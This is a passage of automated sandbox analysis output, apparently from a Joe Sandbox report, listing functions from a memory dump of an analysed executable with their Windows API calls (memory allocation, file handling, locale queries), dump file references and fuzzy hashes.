                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2087232378-0
                                                                                                                                                                                                                                  • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                                                                                                                                                                  • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00405280 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetSystemDefaultLCID.KERNEL32(00000000,004053B6), ref: 0040529F
                                                                                                                                                                                                                                    • Part of subcall function 00404CDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CF9
                                                                                                                                                                                                                                    • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1658689577-0
                                                                                                                                                                                                                                  • Opcode ID: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                                                                                                                                                                                  • Instruction ID: b95c725f163960c8622ba1b0af82130980b93a97e76f79286a035b518bc8de08
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef449c44a2a61a26d18614e24c7ade2666283ce56a0d8fcdc2eeed56ad2c4646
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 90314F75E01509ABCB00DF95C8C19EEB379FF84304F158577E815BB286E739AE068B98
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00407576 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                  • Opcode ID: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                                                                                                                                                                  • Instruction ID: d860c9bcffbd3325f9178b4d72e9b59b5a3ff3896166b15a891a1a6cde46a7a7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8aa5b1e1f382d9b7ab40d46c96f796d669d4b8c7333918930cf1677525ebce7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6EE06D713442082EE3409AEC6C51FA277DCD309354F008032B988DB342D5719D108BE8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00407578 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                  • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                                                                                                                                                                  • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004069DC Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                  • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                                                                                                                                                                  • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004076C8 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                                                                                                                                                                    • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020F03AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 442123175-0
                                                                                                                                                                                                                                  • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                                                                                                                                                                  • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00407284 Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FormatMessage
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1306739567-0
                                                                                                                                                                                                                                  • Opcode ID: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                                                                                                                                                                                  • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7ef42d69529baecca532a801bf1eab389dc79dba057db81877db687b261eaad4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004076AC Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetEndOfFile.KERNEL32(?,02108000,0040AA59,00000000), ref: 004076B3
                                                                                                                                                                                                                                    • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020F03AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFileLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 734332943-0
                                                                                                                                                                                                                                  • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                                                                                                                                                                  • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00406FFB Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                  • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                                                                                                                                                                  • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00407017 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                  • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                                                                                                                                                                  • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00406970 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CharPrev
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 122130370-0
                                                                                                                                                                                                                                  • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                                                                                                                                                                  • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00407F10 Relevance: 1.3, APIs: 1, Instructions: 62memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                  • Opcode ID: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                                                                                                                                                                  • Instruction ID: 1e7236936b067224bcb0a7c190bcfb18a105a15b1652d3161176e1d0ad605fa4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 636722d4ca057b68616df378e1b8a5bd7f337355b9f7c137ab23b8dc1cafdb71
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43116371A042059BDB00EF19C881B5B7794AF44359F05807AF958AB2C6DB38E800CBAA
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00401658 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                                                                                  • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                                                                                                                                                  • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00407548 Relevance: 1.3, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                                                                                                  • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                                                                                                                                                  • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00407EB8 Relevance: 1.3, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3152942510.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3152265849.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3162346883.000000000040B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3164347770.0000000000411000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                                                                                                                  • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
